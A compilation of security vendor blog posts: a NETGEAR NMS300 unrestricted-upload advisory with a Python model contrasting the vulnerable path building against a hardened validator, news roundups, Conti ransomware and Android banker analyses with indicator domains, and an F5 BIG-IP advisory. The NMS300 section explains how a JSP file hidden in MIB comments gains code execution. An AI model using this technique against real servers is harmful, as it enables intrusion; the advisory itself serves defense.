NETGEAR ProSAFE NMS MFileUploadController Vulnerability

Overview:

  Netgear ProSAFE Network Management System NMS300 is a centralized and comprehensive management application that enables network administrators to discover, monitor, configure, and report on SNMP-based enterprise-class network devices. The Netgear Network Management System NMS300 delivers insights into the network, including third-party devices, and its web-based user interface makes it easier to monitor and administer an entire network.

  This vulnerability allows remote attackers to execute arbitrary code on affected installations of NETGEAR ProSAFE Network Management System 1.6.0.26. Authentication is not required to exploit this vulnerability. The specific flaw exists within the MFileUploadController class. The issue results from the lack of proper validation of a user-supplied path, prior to use in file operations. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.

CVE Reference:

  This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2021-27274.

Common Vulnerability Scoring System (CVSS):

  The overall CVSS score is 8.6 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H/E:U/RL:O/RC:C).

  Base score is 9.9 (AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H), based on the following metrics:
    • Attack vector is network.
    • Attack complexity is low.
    • Privileges required is low.
    • User interaction is none.
    • Scope is changed.
    • Impact of this vulnerability on data confidentiality is high.
    • Impact of this vulnerability on data integrity is high.
    • Impact of this vulnerability on data availability is high.
  Temporal score is 8.6 (E:U/RL:O/RC:C), based on the following metrics:
    • The exploit code maturity level of this vulnerability is unproven.
    • The remediation level of this vulnerability is official fix.
    • The report confidence level of this vulnerability is confirmed.

Attack Packet Overview:

  The Content-Type header line contains the following:

    • “multipart/form-data” – The body is made up of multiple parts, each delimited by the boundary string.
    • “boundary=” – The delimiter string that separates the parts.

  The Content-Disposition header line contains the following:

    • “form-data” – The disposition type used for form submissions.
    • “name=” – The name of the form field being submitted.
    • “filename=” – The suggested file name to use if the part is detached and stored as a separate file.

  

Technical Overview:

  A user with the “observer” privilege can manage the MIB config files via the “mib browser” page in the NMS300 web interface to upload a MIB config file. A request to the Request-URI “/lib-1.0/external/flash/MfileUpload.do” will be sent to the server to upload a MIB config file.

  The MIB file content is transferred in a multipart/form-data part within the HTTP message body, and the filename parameter within the Content-Disposition header specifies the name of the file. The uploaded file will be saved into the following directory:

  /Install_Dir/apache-tomcat-6.0.33/webapps/ROOT/type_dir/sub_dir/filename/

  Where the “Install_Dir” is where the NMS300 is installed, and the “filename” is the filename parameter within the Content-Disposition header in the multipart/form-data part. The “type_dir” and “sub_dir” are derived from mapping the value of the type and sub request parameters to various sub-directory names. This mapping is specified in the file “resource.properties” which has the following contents:

  

  For example, if the type parameter value is “mib”, the “type_dir” is “WEB-INF/mibs/Customized/”; if the sub parameter value is “4”, the “sub_dir” is “Switch/”. Therefore, for an uploaded file named “a.mib”, the nms300_mibpath is:

  /Install_Dir/apache-tomcat-6.0.33/webapps/ROOT/WEB-INF/mibs/Customized/Switch/a.mib

  If the type and sub parameters are omitted or contain an empty value, the “type_dir” is assigned the string “null” and the “sub_dir” is assigned the empty string “” in the application. Therefore, the nms300_mibpath for the uploaded MIB file is the string below:

  /Install_Dir/apache-tomcat-6.0.33/webapps/ROOT/nulla.mib

  An unrestricted file upload vulnerability exists in the NETGEAR Management System NMS300. The vulnerability is due to a failure to validate the file type of the uploaded file. When the server receives an HTTP POST request whose Request-URI contains “/lib-1.0/external/flash/MfileUpload.do”, the method uploadFile() in the MFileUploadController class is executed. This method retrieves the values of the type, sub, and filename parameters from the request and uses them to build the nms300_mibpath for the uploaded MIB file. The uploadFile() method then writes the uploaded file content to the nms300_mibpath and calls the parseNewMIB() method of the MibLoader class to parse the uploaded MIB file. If the uploaded file is not in the format of a MIB config file, parseNewMIB() throws an exception and uploadFile() deletes the uploaded file.

  However, uploadFile() does not check the filename parameter for dangerous file extensions, and it does not validate the type and sub parameters. If the type and sub parameters are omitted or contain an empty value, an attacker can upload a malicious JSP file with a filename parameter such as “poc.jsp”, and the file will be saved to the following nms300_mibpath:

  /Install_Dir/apache-tomcat-6.0.33/webapps/ROOT/nullpoc.jsp

  Because uploadFile() deletes the uploaded file if it is not a MIB config file, the attacker must pass this check. The attacker can achieve this by embedding the malicious JSP code inside the comment lines of a normal MIB config file, as shown in the example below:

  

  Here each comment line starts with “--” and the JSP code follows. This keeps the uploaded JSP file on the server without it being deleted. Because files under the directory “/Install_Dir/apache-tomcat-6.0.33/webapps/ROOT/” can be accessed remotely via HTTP requests without any restriction, the attacker can then submit a subsequent request with a URL as below:

  hxxp://server-ip:8080/nullpoc.jsp

  and get the uploaded JSP file executed on the target server, which can cause arbitrary code execution.

  Note that, beginning with NMS300 version 1.5.0.14, authentication is required to access the URI “/lib-1.0/external/flash/MfileUpload.do”. Therefore, in general, an attacker must authenticate to the server to exploit this vulnerability; unauthenticated attacks are only possible against servers older than version 1.5.0.14.

  A remote attacker could exploit the vulnerability by sending crafted HTTP requests to the target server. Successful exploitation would result in the code execution under the security context of SYSTEM.
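The path construction described above, beside the validation uploadFile() lacks, as an added example (Python, not NMS300 code). The type/sub mappings are the two the text quotes; the installation directory placeholder, the sample multipart request, and the .mib-only filename policy are assumptions made here.

```python
"""Models the NMS300 MIB upload path construction from the advisory and the checks the
handler lacks.  Added example, not NMS300 source.

Constructed/assumed: the INSTALL_DIR placeholder, the multipart sample request, and the
validator policy (only plain `<name>.mib` basenames).  The type/sub mappings are the
two the advisory quotes (mib -> WEB-INF/mibs/Customized/, 4 -> Switch/)."""
import posixpath
import re

INSTALL_DIR = "/Install_Dir"  # placeholder for the real installation directory
WEBAPP_ROOT = f"{INSTALL_DIR}/apache-tomcat-6.0.33/webapps/ROOT"
TYPE_DIRS = {"mib": "WEB-INF/mibs/Customized/"}   # resource.properties: type -> type_dir
SUB_DIRS = {"4": "Switch/"}                       # resource.properties: sub  -> sub_dir
MIB_BASE = posixpath.join(WEBAPP_ROOT, "WEB-INF/mibs/Customized")
SAFE_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}\.mib")  # policy: plain basename, .mib only


def parse_multipart(body: bytes, boundary: str) -> list:
    """Minimal multipart/form-data parser: name, filename and payload for each part."""
    parts = []
    for chunk in body.split(b"--" + boundary.encode())[1:]:
        if chunk.startswith(b"--"):          # "--boundary--" closes the body
            break
        head, _, payload = chunk.lstrip(b"\r\n").partition(b"\r\n\r\n")
        headers = {}
        for line in head.decode("latin-1").split("\r\n"):
            key, _, value = line.partition(":")
            headers[key.strip().lower()] = value.strip()
        params = dict(re.findall(r'(\w+)="([^"]*)"', headers.get("content-disposition", "")))
        parts.append({"name": params.get("name"), "filename": params.get("filename"),
                      "payload": payload.rstrip(b"\r\n")})
    return parts


def vulnerable_mib_path(type_param, sub_param, filename):
    """Path construction as the advisory describes it: a missing or empty `type` becomes
    the string "null", a missing or empty `sub` becomes "", and the filename is appended
    unchecked.  (Unmapped non-empty values are treated like missing ones here; the
    advisory only documents the missing/empty case.)"""
    type_dir = TYPE_DIRS.get(type_param or "", "null")
    sub_dir = SUB_DIRS.get(sub_param or "", "")
    return WEBAPP_ROOT + "/" + type_dir + sub_dir + filename


class UploadRejected(ValueError):
    """Raised by the hardened path builder instead of writing the file."""


def hardened_mib_path(type_param, sub_param, filename):
    """Same inputs, but every value is validated before it reaches the file system."""
    if type_param not in TYPE_DIRS or sub_param not in SUB_DIRS:
        raise UploadRejected("unknown type/sub mapping")              # no "null" fallback
    if not SAFE_NAME.fullmatch(filename or ""):
        raise UploadRejected("filename must be a plain <name>.mib")   # no .jsp, no separators
    target = posixpath.normpath(posixpath.join(WEBAPP_ROOT, TYPE_DIRS[type_param],
                                               SUB_DIRS[sub_param], filename))
    if not target.startswith(MIB_BASE + "/"):                          # containment check
        raise UploadRejected("resolved path escapes the MIB directory")
    return target


def handle_upload(body: bytes, boundary: str, hardened: bool):
    """Extract type, sub and the file part from the request and build the save path.
    Returns the path, or None when the hardened builder rejects the upload."""
    fields = {p["name"]: p for p in parse_multipart(body, boundary)}
    type_param = fields.get("type", {}).get("payload", b"").decode() or None
    sub_param = fields.get("sub", {}).get("payload", b"").decode() or None
    file_part = next((p for p in fields.values() if p["filename"]), None)
    filename = file_part["filename"] if file_part else ""
    if not hardened:
        return vulnerable_mib_path(type_param, sub_param, filename)
    try:
        return hardened_mib_path(type_param, sub_param, filename)
    except UploadRejected:
        return None


def sample_request(type_param, sub_param, filename):
    """Constructed multipart body for MfileUpload.do (sample data, not a capture)."""
    boundary = "----ConstructedBoundary"
    parts = []
    if type_param is not None:
        parts.append(f'Content-Disposition: form-data; name="type"\r\n\r\n{type_param}')
    if sub_param is not None:
        parts.append(f'Content-Disposition: form-data; name="sub"\r\n\r\n{sub_param}')
    parts.append(f'Content-Disposition: form-data; name="file"; filename="{filename}"\r\n'
                 f'Content-Type: application/octet-stream\r\n\r\n-- constructed MIB body')
    body = "".join(f"--{boundary}\r\n{p}\r\n" for p in parts) + f"--{boundary}--\r\n"
    return body.encode(), boundary


if __name__ == "__main__":
    body, boundary = sample_request(None, None, "poc.jsp")
    print(handle_upload(body, boundary, hardened=False))  # .../webapps/ROOT/nullpoc.jsp
    print(handle_upload(body, boundary, hardened=True))   # None: rejected before any write
```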

Triggering the Problem:

  • The target system must have the vulnerable product installed and running.
  • The attacker must have network connectivity to the affected ports.
  • The attacker must authenticate to the target system.

Triggering Conditions:

  The attacker authenticates and then sends an HTTP request containing crafted parameters to upload a malicious file to the target server. The vulnerability is triggered when the server processes the request.

Attack Delivery:

  The following application protocols can be used to deliver an attack that exploits this vulnerability:
    • HTTP, over port 8080/TCP

SonicWall’s Intrusion Prevention System (IPS) provides protection against this threat:

  • IPS 15572: NETGEAR ProSAFE MFileUploadController Arbitrary File Creation

Remediation Details:

  The risks posed by this vulnerability can be mitigated or eliminated by:
    • Blocking the affected ports from external network access if they are not required.
    • Upgrading the product to a non-vulnerable version.
  The vendor has released the following advisory regarding this vulnerability:
    Vendor Advisory

Cybersecurity News & Trends – 05-27-21

This week, healthcare was under attack in the U.S. and abroad, as facilities reported outages and blackmail demands.


SonicWall in the News

Discord is now the young hacker’s weapon of choice — here’s why — tom’s guide
“Discord is the potential future of the dark net,” said Brook Chelmo, a senior strategist for SonicWall, during his recent RSA session.

Fish out the Phishing attacks — Security Middle East & Africa
“The best defense against most credential harvesting attacks is the use of a password manager,” SonicWall’s Mohamed Abdallah said. “Most are free, and none can be fooled into entering a password into a malicious site, no matter how authentic it seems.”


Industry News

As Chips Shrink, Rowhammer Attacks Get Harder to Stop — Ars Technica
A full fix for the “Half-Double” technique will require rethinking how memory semiconductors are designed.

Rise in Opportunistic Hacks and Info-Sharing Imperil Industrial Networks — Dark Reading
Security researchers have seen an increasing wave of relatively simplistic attacks involving ICS systems (and attackers sharing their finds with one another) since 2020.

Alleged North Korean hackers scouted crypto exchange employees before stealing currency — Cyberscoop
Suspected North Korean hackers have breached cryptocurrency exchanges in Japan, Europe, the U.S. and Israel in an effort to steal millions of dollars from the platforms in the last three years.

Ransomware: Two-thirds of organisations say they’ll take action to boost their defences — ZDNet
The impact of the Colonial Pipeline ransomware attack is leading companies to re-examine their cybersecurity strategies.

New Zealand Hospitals Under Prolonged IT Outage From Ransom Hack — Bloomberg
Systems are still down a week after a ransomware attack disrupted the IT network of five hospitals in the New Zealand district of Waikato, and concerns remain that private patient information may have been exposed.

Iranian hacking group targets Israel with wiper disguised as ransomware — Bleeping Computer
An Iranian hacking group has been observed camouflaging destructive attacks against Israeli targets as ransomware attacks. Meanwhile, they’re maintaining access to victims’ networks for months.

Gartner: Global Security Spending Will Reach $150 Billion in 2021 — Security Week
Gartner says nearly half (roughly $72 billion) will be spent on security services, including consulting, hardware support, and implementation and outsourced services.

Hear ye, DarkSide! This honorable ransomware court is now in session — Ars Technica
A crime forum is holding a quasi-judicial proceeding against the makers of DarkSide to hear claims from former affiliates who say the makers skipped town without paying.

FBI identifies 16 Conti ransomware attacks striking US healthcare, first responders — ZDNet
The targets identified include 911 dispatch carriers, law enforcement agencies and emergency medical services — all of which have been attacked over the past year as medical services struggled to manage the pandemic.

Vulnerability in VMware product has severity rating of 9.8 out of 10 — Ars Technica
The security flaw, which VMware disclosed and patched on Tuesday, resides in the vCenter Server, one of the most popular virtualization solutions on the market.

Cyber insurance premiums, take-up rates surge, says GAO — ZDNet
A General Accountability Office report finds that cyber insurance premiums surged in 2020 based on more frequent cyberattacks. That trend is likely to continue.

Zeppelin ransomware comes back to life with updated versions — Bleeping Computer
The developers of Zeppelin ransomware have resumed activity after a period of relative silence that started last fall.

This massive phishing campaign delivers password-stealing malware disguised as ransomware — ZDNet
Java-based STRRAT malware creates a backdoor into infected machines — but distracts victims by acting like ransomware.

Bizarro banking malware targets 70 banks in Europe and South America — Bleeping Computer
A banking trojan named Bizarro that originates from Brazil has crossed the borders and started to target customers of 70 banks in Europe and South America.

E-commerce giant suffers major data breach in Codecov incident — Bleeping Computer
E-commerce platform Mercari has disclosed a major data breach incident that occurred due to exposure from the Codecov supply-chain attack.

QNAP confirms Qlocker ransomware used HBS backdoor account — Bleeping Computer
QNAP is advising customers to update the HBS 3 disaster recovery app. The goal: to block Qlocker ransomware attacks targeting their Internet-exposed Network Attached Storage (NAS) devices.


In Case You Missed It

Infiltrate, Adapt, Repeat: A Look at Tomorrow’s Malware Landscape — Brook Chelmo
Join us for the 2021 SonicWall Partner Virtual Roadshow — David Bankemper
Capture Client 3.6 Launch Brings Key Features — Brook Chelmo
Using Client VPN with Your Firewall for WFH: a Setup for Disaster? — Jean-Pier Talbot
Triple Threat: CRN’s 2021 Women of the Channel List Honors SonicWall Leaders — Lindsey Lockhart

Conti operator demands $20M from victim. Faces litigation backlash instead

The SonicWall Capture Labs threat research team has recently been tracking Conti ransomware. It has been reported that Conti has been connected with over 400 cyberattacks against organizations around the world. In addition to encrypting files and holding them hostage for ransom, the attackers attempt to increase the chances of a payout by threatening to publish sensitive data stolen from company networks. Such double-extortion schemes are a growing trend with ransomware.

 

Infection Cycle:

 

Conti ransomware is aimed at large company networks. The initial infection is handled manually by the attackers and usually starts with phishing attempts or firewall exploits. Once inside a network, a Cobalt Strike beacon is introduced onto the system to communicate with the attacker’s C2 server. Once the backdoors are established, the attackers propagate malware further within the network and begin to exfiltrate sensitive data that will be used later for extortion. After this, the Conti malware is deployed.

 

Conti malware uses the following icon:

 

Upon infection, files on the system are encrypted. Each encrypted file is given a .FEEDC extension. A file named readme.txt is dropped into directories containing encrypted files. It contains the following message:

 

 

https://contirecovery.top is down, but the Tor link leads to the following page:

 

After uploading readme.txt to the Tor website, the following conversation can be seen between a prior victim and the operator.

 

 

As seen in the message above, the operator demands a staggering $20M for file decryption.

 

After a few days, the victim fights back with litigation:

 

SonicWall Capture Labs provides protection against this threat via the following signatures:

  • GAV: Conti.RSM (Trojan)
  • GAV: Conti.RSM_2 (Trojan)
  • GAV: Conti.RSM_3 (Trojan)
  • GAV: Conti.RSM_4 (Trojan)
  • GAV: Cobaltstrike.A_1 (Trojan)
  • GAV: Cobaltstrike.A_2 (Trojan)
  • GAV: Cobaltstrike.A_3 (Trojan)
  • GAV: Cobaltstrike.A_4 (Trojan)

This threat is also detected by SonicWall Capture ATP w/RTDMI and the Capture Client endpoint solutions.

Infiltrate, Adapt, Repeat: A Look at Tomorrow’s Malware Landscape

What would you think if I told you that malware attacks are down, but new variants of malware are up? According to the SonicWall 2021 Cyber Threat Report, malware attacks are down from their high three years ago, showing an overall drop of 43% in 2020. Despite that sounding like great news, SonicWall found a 73% increase in new and updated strains of malware that couldn’t have been caught by traditional defenses that rely on static definitions.

With the way things are going, we expect this trend to continue in the near future. But why is this happening — and what does it mean? I believe the threat landscape is as active as it is because of many new entrants to the game and faster development.

New Entrants

In my research for my RSA talk on how the youngest generation is learning to hack, I found that the TV show Mr. Robot has created many fans who all want to learn how to hack. These youngsters are approaching the subject at a young age and have more resources available to them when compared to previous generations. There are many safe places for them to test their skills, like “Hack the Box,” but over time they want to test new skills on real companies. The more responsible ones will offer to do penetration testing, while others may go into malware development and attacking.

Almost all new entrants into the game are looking to build something and see what they can get past our defenses. Almost all of those that I interviewed over the last year are getting into ransomware, which could explain why SonicWall saw a 62% rise in this malware type in 2020. The strains they are building are becoming so advanced that it scares me. They have moved from idolizing fictional characters to becoming the real attackers. In the case of Hildacrypt, they have moved from making their own version of Petya to working on a strain that models the tactics of the crew that developed SamSam ransomware.

Faster Development

Other bands of people will join fellow attackers to create ransomware and other forms of malware with different modules (e.g. malicious bootloaders, runners, decrypters, etc.) and test it on real-world subjects. After a round of attacks, they will go to VirusTotal to see if anyone has identified their strain. After discovery, they will make changes to the code, ensuring any files used hash differently (hashing a file is how a computer identifies a file). They’ll also improve a strain’s performance to make it more effective.

After this, the next attack launches, and the cycle repeats itself. For instance, WannaCry had numerous versions come out within the initial weeks of the first major attacks. While VirusTotal isn’t the end-all for malware detection, since it’s the most notable, attackers will frequently check to see when their strains are registered, which takes around two to three days before they must switch gears. With that information, they will build in new evasion tactics based on who found them first and work backwards as they build versions 2, 3, 4, etc.

Over time, these malware developers may transition from project to project, bringing their expertise and experience with them when developing a new strain of malware with a new team. When they struggle to build a module themselves or have issues troubleshooting a problem, there is an active and cheap marketplace with customer service available to help fill in the gaps. Today, it is easier to get paid through ransomware and then pay for help developing code thanks to cryptocurrencies. So, for the foreseeable future, you can expect to see more people getting into malware development, with many new variants on the horizon.

Stopping Malware of the Future

The storyline behind advanced persistent threats goes far beyond ransomware. The other hot ticket is, and always has been, the exfiltration of data from corporate sources. I have always said that the best way to set your IT security budget is to ask yourself, “What is the value of my data to an attacker?” A lot of us overly protect data that is of little use to an attacker yet leave some essential data less guarded because it means less to us. Our customers’ data and our intellectual property are two of the things we typically protect first.

When developing your philosophy on upgrading your network protection, we typically start at the network, then look at connections, then the endpoint itself, and then its path to the cloud.

Without giving away the whole story now, we typically start with the inspection of traffic coming into the network. With 70% of sessions today being encrypted, we also take a hard look at inspecting that traffic as well. Next, we will look to how we inspect for unknown malware that can’t be found by a traditional next-generation firewall. Sandboxing engines have been around since 2011, and they have evolved to look for malware across multiple engines — including within the memory of the system, since this is where a lot of attacks (such as fileless attacks) try to initiate to hide how they got into the network and remain undetected and undeterred by security software.

Would you believe that customers use Capture ATP with Real-Time Deep Memory Inspection (RTDMI) to find between 1,400 to 1,600 new forms of malware every business day, many of these with numerous evasion tactics?

SonicWall has been in IT security for 30 years now, and we have seen it all. We have morphed from a firewall company into a security platform company. We famously stopped WannaCry in its tracks on our customer’s networks three weeks before the first major attack was ever noted. We have found and named several new strains throughout our research and continue to develop new and better technologies to help you discover and stop unknown, zero-day and updated attacks on your own network.

 

F5 BIG-IP iControl remote command execution vulnerability

SonicWall Capture Labs threat research team observed attacks exploiting a vulnerability in F5’s BIG-IP iControl API.

BIG-IP

F5’s BIG-IP is a product family consisting of software, hardware, and virtual appliances designed around application availability, access control, and security solutions. BIG-IP software products run on top of F5’s Traffic Management Operation System® (TMOS), designed specifically to inspect network and application traffic and make real-time decisions based on the configurations given. BIG-IP Configuration Utility is a Web GUI for F5 users to set up the BIG-IP product and to make additional changes.

Vulnerability | CVE-2021-22986
BIG-IP iControl is a REST API for BIG-IP, which is accessible over HTTPS on port 443/TCP via the following URL:

https://<host>/mgmt/tm/

The BIG-IP iControl REST interface has an unauthenticated remote command execution vulnerability. It allows unauthenticated attackers with network access to the iControl REST interface, through the BIG-IP management interface and self IP addresses, to execute arbitrary system commands, create or delete files, and disable services. The vulnerability can only be exploited through the control plane. Exploitation can lead to complete system compromise. An unauthenticated, remote attacker could exploit this vulnerability by sending a specially crafted request to the vulnerable REST interface. Due to insufficient validation of login requests to the REST API, the attacker is able to bypass authentication.

After bypassing authentication, a remote attacker can use multiple vectors to execute commands on the target server, as shown below:

The following JSON payload would execute the “id” command on the underlying operating system:

The following versions are vulnerable:

    • 16.0.x before 16.0.1.1
    • 15.1.x before 15.1.2.1
    • 14.1.x before 14.1.4
    • 13.1.x before 13.1.3.6
    • 12.1.x before 12.1.5.3
    • BIG-IQ 7.1.0.x before 7.1.0.3 and 7.0.0.x before 7.0.0.2

This vulnerability has been patched. The vendor advisory is available here.

SonicWall Capture Labs provides protection against this threat via the following signatures:

    • IPS 15471: F5 BIG-IP iControl REST Remote Command Execution 1
    • IPS 15472: F5 BIG-IP iControl REST Remote Command Execution 2
    • IPS 15473: F5 BIG-IP iControl REST Remote Command Execution 3

Threat Graph

Android banker with hardcoded financial targets

SonicWall Threats Research Team received reports of an Android banker campaign that has a multitude of features and commands at its disposal. The samples we analyzed contain a hardcoded list of financial institutions; the device is monitored for their apps, and fake login pages are shown if one of these targeted apps is found running on the device.

Sample Details

  • MD5:  9d050ee9d306fa2228b3ddb1840bfb61
  • Application Name: OLX
  • Package Name: man.cube.ship

Infection Cycle

Among the permissions requested, the following are a few sensitive/dangerous ones:

  • android.permission.BIND_ACCESSIBILITY_SERVICE
  • android.permission.CALL_PHONE
  • android.permission.GET_TASKS
  • android.permission.READ_SMS
  • android.permission.REAL_GET_TASKS
  • android.permission.RECEIVE_BOOT_COMPLETED
  • android.permission.RECEIVE_SMS
  • android.permission.SEND_SMS
  • android.permission.SYSTEM_ALERT_WINDOW
  • android.permission.WRITE_SETTINGS

 

Upon installation and execution, the malware does not show any screens or interface of any kind, but continues to perform malicious actions in the background:

The Manifest.xml file points to a Main Activity class that gets invoked when the application runs, but this class is not seen in the code base once decompiled:

This suggests that a DEX file containing the actual deobfuscated code is dropped when the application executes. We observed a file being dropped into the app_DynamicOptDex folder on the device where the app is installed. The file ZTpqTR.json is actually a DEX file that contains legible malicious code.

Observations from the code

Interesting elements are present in a class file that can be considered the configuration file, as it contains a number of hardcoded elements:

Server that the malware communicates with:

  • http://ro-37[.]in/myaccount/login[.]php

A number of domains marked as Gates:

  • http://analkarnavalbubenec[.]pw/3lfk3jGj/
  • http://karambga3j[.]net/3lfk3jGj/
  • http://lkrishtian1[.]com/3lfk3jGj/
  • http://lkrishtifaa[.]com/3lfk3jGj/

A list of the financial applications the malware targets, along with what look like fake login pages uploaded to a domain (which has been taken down as of this writing); the complete file can be viewed here.

 

The malware has capabilities to accept the following commands and execute the corresponding functionalities:

  • registration
  • send_sms
  • sms_contact
  • sms_contacts
  • get_push
  • tracker
  • move_sms_client
  • mard_mode – spelling mistake for hard mode
  • call_number
  • startes_access

 

Network activity

The malware communicated with the following domains during our analysis:

  • ro-27[.]in
  • lkrishtifaa[.]com

 

The following VirusTotal graph can be seen for this apk:

 

Banker Targets

The malware targets a number of financial institutions, notable targets include:

  • AlfaBank – Commercial bank in Russia
  • OpenBank – An online bank, headquartered in Madrid
  • Tinkoff – Russian bank based in Moscow
  • VTB24 – Leading universal bank of Russia
  • Mbank – Banking group in Poland
  • HomeCredit – An international non-bank financial institution headquartered in Netherlands

 

SonicWall Capture Labs provides protection against this threat via the following signature:

  • AndroidOS.Banker.DR_1

 

Indicators of compromise (IOC):

  • 9d050ee9d306fa2228b3ddb1840bfb61

Join us for the 2021 SonicWall Partner Virtual Roadshow

As a company 100% committed to the channel, SonicWall takes pride in the opportunities we offer our partners — and we’re especially excited to bring you our upcoming SonicWall SecureFirst Partner Virtual Roadshow, June 15-17.

This year’s Roadshow will offer helpful workshops covering sales positioning, opportunity identification and other valuable training to enhance your partner experience, along with the ability to interact with your regional teams in an open forum.

But our latest products and advancements will be at the center of this year’s Roadshow. During the event, we’ll be focusing on all new SonicWall product updates, including Gen 7, plus offering an advance look at future product updates.

Best of all, attendees can take advantage of hands-on demos of some of our newest SonicWall solutions, designed to help you secure your customers in a work reality where everyone is remote, mobile and unsecure.

Here’s a sampling of the products that will be on display:

The new SonicWall NSa 3700 Next-Generation Firewall (NGFW)

The SonicWall Network Security Appliance (NSa) 3700 next-generation firewall (NGFW) offers medium and large enterprises industry-leading performance at the lowest total cost of ownership in its class. In addition to its ability to scale to support millions of connections, it can also scan these connections for threats over multi-gigabit speeds without compromising performance. The NSa 3700 simplifies management, even when dealing with multiple networks and clouds.

We’ll also be showcasing exciting new updates to SonicWall WNM, SonicWall NGA and SonicWall NSM.

SonicWall Wireless Network Manager WNM 3.5 is a cloud-based wireless network management system that simplifies access-point deployment, management and monitoring. WNM is fully integrated with Capture Security Center, providing seamless integration with MySonicWall and Licensing.

SonicWall Analytics NG – NGA 3.0 is a powerful, intelligence-driven analytics service, designed to give you a direct line of sight into the security posture of your network and users in real time, all through a single pane of glass.

SonicWall Network Security Manager (NSM) 2.2, a multi-tenant centralized firewall manager, allows you to centrally manage all firewall operations error-free by adhering to auditable workflows. This versatile solution comes in both on-prem and SaaS versions to fit your unique network needs.

If you’re interested in attending an upcoming virtual roadshow event in North America, check out the table below for available events and register for one near you:

Date    | Eastern Time    | Pacific Time    | Region                                  | Attendee Reg Link
June 15 | 10:30am – Noon  | 7:30am – 9am    | Q2 2021 Roadshow – Northeast            | Register Now
June 15 | 1:30pm – 3pm    | 10:30am – 12pm  | Q2 2021 Roadshow – Central US           | Register Now
June 16 | 10:30am – Noon  | 7:30am – 9am    | Q2 2021 Roadshow – Southeast            | Register Now
June 16 | 1:30pm – 3pm    | 10:30am – 12pm  | Q2 2021 Roadshow – Canada               | Register Now
June 16 | 4:30pm – 6pm    | 1:30pm – 3pm    | Q2 2021 Roadshow – California           | Register Now
June 17 | 10:30am – Noon  | 7:30am – 9am    | Q2 2021 Roadshow – Midwest/Mid-Atlantic | Register Now
June 17 | 1:30pm – 3pm    | 10:30am – 12pm  | Q2 2021 Roadshow – West US              | Register Now

For More News …

If you aren’t already, follow our dedicated partner-focused account @SNWLSecChannel on Twitter.

You can also follow us on Twitter and Facebook for the latest SonicWall news.

 

Cybersecurity News & Trends – 05-21-21

This week the DarkSide ransomware group dominated the headlines, launching additional attacks, bringing in large quantities of Bitcoin and (hopefully) being shut down for good.


SonicWall in the News

‘It’s a battle, it’s warfare’: experts seek to defeat ransomware attackers — Financial Times

  • Financial Times reporter Hannah Murphy references SonicWall data as she explores the lucrative industry of ransomware.

Breaking into New Technology with Partners — Channel Pro Network

  • MiradorIT cites its partnership with ASCII member Net Sciences for enabling it “to move into advanced cybersecurity by offering high-availability SonicWall deployments.”

Windows 10 has a built-in ransomware block, you just need to enable it — PC Gamer

  • Turns out there is a mechanism in Windows Defender that can help protect your files from ransomware. PC Gamer leverages SonicWall data to educate readers.
    *Syndicated: PC Gamer – UK

D&H Defies Pandemic: Grows U.S. Sales 19 Percent, Breaks $5B Barrier — CRN

  • D&H Distributing, the 104-year-old, employee-owned SMB distribution stalwart, helped its partners power through the global pandemic — and in the process, posted a whopping 160% increase in cloud sales for the fiscal year.

Industry News

The Full Story of the Stunning RSA Hack Can Finally Be Told — Wired

  • In 2011, Chinese spies stole the crown jewels of cybersecurity — stripping protections from firms and government agencies worldwide.

Denial of Electricity Service Could Become Next Geopolitical Weapon — The Wall Street Journal

  • With electricity expected to account for a large share of the world’s energy use by 2050, the stakes are high.

Colonial Pipeline CEO: Paying DarkSide ransom was the ‘right thing to do for the country’ — ZDNet

  • The chief executive of Colonial Pipeline has defended paying cybercriminals who launched a devastating attack on the company, calling it the “right thing to do for the country.”

School districts struggle to defend against rising ransomware attacks — The Hill

  • Cybercriminals are stepping up their efforts to hack into vulnerable school districts, often launching ransomware attacks like the kind that shut down Colonial Pipeline earlier this month.

Bizarro banking Trojan surges across Europe — ZDNet

  • Operators have targeted customers of at least 70 banks across Europe and South America so far.

Chemical distributor pays $4.4 million to DarkSide ransomware — Bleeping Computer

  • Chemical distribution company Brenntag paid a $4.4 million ransom to the DarkSide ransomware gang to receive a decryptor for encrypted files and prevent the threat actors from publicly leaking stolen data.

Legislation to secure critical systems against cyberattacks moves forward in the House — The Hill

  • Multiple bills meant to secure critical infrastructure against cyberthreats were approved by the House Homeland Security Committee — just a week after a ransomware attack on the Colonial Pipeline caused fuel shortages across the nation.

New Zealand hospitals infected by ransomware, cancel some surgeries — The Register

  • New Zealand’s Waikato District Health Board has been hit with ransomware that took down most IT services and drastically reduced services at six of its affiliate hospitals.

Hackers scan for vulnerable devices minutes after bug disclosure — Bleeping Computer

  • Every hour, a threat actor starts a new scan on the public web for vulnerable systems, moving at a quicker pace than global enterprises when trying to identify serious vulnerabilities on their networks.

Supply chain hacking attacks: Government eyes new rules to tighten security — ZDNet

  • The UK might soon require managed IT service providers to undergo extra cybersecurity checks.

‘Catastrophic’ cyberattack larger than pipeline hack increasingly likely, acting CISA chief says — The Washington Times

  • A top U.S. government official said it is increasingly likely the federal government will be faced with a “catastrophic cyber incident” larger in scope than the recent Colonial Pipeline hack.

After just 9 months, Darkside ransomware gang brings in $90 million in Bitcoin — ZDNet

  • The cryptocurrency was sourced from 47 different wallets, according to research from Elliptic.

Insurer AXA hit by ransomware after dropping support for ransom payments — Bleeping Computer

  • Branches of insurance giant AXA based in Thailand, Malaysia, Hong Kong and the Philippines have been struck by a ransomware cyberattack, with 3 TB of sensitive data stolen from AXA’s Asian operations.

DarkSide ransomware servers reportedly seized, REvil restricts targets — Bleeping Computer

  • The DarkSide ransomware operation has allegedly shut down, after the threat actors lost access to servers and their cryptocurrency was transferred to an unknown wallet.

Toshiba unit struck by DarkSide ransomware group — ZDNet

  • Following Colonial Pipeline, a DarkSide affiliate has claimed another victim.

In Case You Missed It

Capture Client 3.6 Launch Brings Key Features

We’re pleased to announce the SonicWall Capture Client 3.6 release, which offers our customers the addition of three key features.

First, the new kextless agent allows macOS users to update their systems to Big Sur. The release also includes the latest SentinelOne features via the SentinelOne 4.6 agent, which brings enhanced threat and device management along with a number of bug fixes. Furthermore, it allows customers who were previously on 3.1 to upgrade to the latest client and take advantage of the features that were initially offered to our MSSP customers in the 3.5 release.

For those of you who are not aware of the previously released 3.5 features, here’s a quick summary:

